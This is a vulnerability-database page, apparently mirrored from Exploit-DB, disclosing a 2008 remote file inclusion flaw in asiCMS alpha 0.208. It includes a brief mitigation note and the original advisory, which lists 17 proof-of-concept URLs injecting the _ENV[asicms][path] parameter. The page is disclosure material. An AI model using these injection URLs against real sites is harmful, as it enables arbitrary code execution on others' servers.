header-logo
Suggest Exploit
vendor:
asiCMS
by:
NoGe
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: asiCMS
Affected Version From: 0.208
Affected Version To: 0.208
Patch Exists: NO
Related CWE: N/A
CPE: a:asicms:asicms:0.208
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

asiCMS alpha 0.208 Multiple Remote File Inclusion Vulnerability

asiCMS alpha 0.208 is vulnerable to multiple remote file inclusion vulnerability. This vulnerability is caused due to the use of user-supplied input without proper validation. An attacker can exploit this vulnerability by sending malicious input to the vulnerable parameter _ENV[asicms][path] in the affected files. This can allow an attacker to execute arbitrary code on the vulnerable system.

Mitigation:

The best way to mitigate this vulnerability is to validate user-supplied input before using it. Also, the application should be configured to use the least privilege principle.
Source

Exploit-DB raw data:

===========================================================================================


  [o] asiCMS alpha 0.208 Multiple Remote File Inclusion Vulnerability

       Software : asiCMS version alpha 0.208
       Vendor   : http://asicms.sourceforge.net/
       Download : http://sourceforge.net/project/showfiles.php?group_id=203457
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com


===========================================================================================


  [o] Vulnerable file

       classes/Auth/OpenID/Association.php
       classes/Auth/OpenID/BigMath.php
       classes/Auth/OpenID/DiffieHellman.php
       classes/Auth/OpenID/DumbStore.php
       classes/Auth/OpenID/Extension.php
       classes/Auth/OpenID/FileStore.php
       classes/Auth/OpenID/HMAC.php
       classes/Auth/OpenID/MemcachedStore.php
       classes/Auth/OpenID/Message.php
       classes/Auth/OpenID/Nonce.php
       classes/Auth/OpenID/SQLStore.php
       classes/Auth/OpenID/SReg.php
       classes/Auth/OpenID/TrustRoot.php
       classes/Auth/OpenID/URINorm.php
       classes/Auth/Yadis/XRDS.php
       classes/Auth/Yadis/XRI.php
       classes/Auth/Yadis/XRIRes.php

      All the file is affected by _ENV[asicms][path] variable



  [o] Exploit

       http://localhost/[path]/classes/Auth/OpenID/Association.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/OpenID/BigMath.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/OpenID/DiffieHellman.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/OpenID/DumbStore.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/OpenID/Extension.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/OpenID/FileStore.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/OpenID/HMAC.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/OpenID/MemcachedStore.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/OpenID/Message.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/OpenID/Nonce.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/OpenID/SQLStore.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/OpenID/SReg.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/OpenID/TrustRoot.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/OpenID/URINorm.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/Yadis/XRDS.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/Yadis/XRI.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/Yadis/XRIRes.php?_ENV[asicms][path]=


===========================================================================================


  [o] Greetz

       MainHack BrotherHood [ www.mainhack.com ]
       VOP Crew [ Vaksin13 OoN_BoY Paman ]
       H312Y yooogy mousekill }^-^{ k1tk4t
       skulmatic olibekas ulga Cungkee str0ke

        
===========================================================================================

# milw0rm.com [2008-10-06]

Navigation

Suggest Exploit

Services By CQR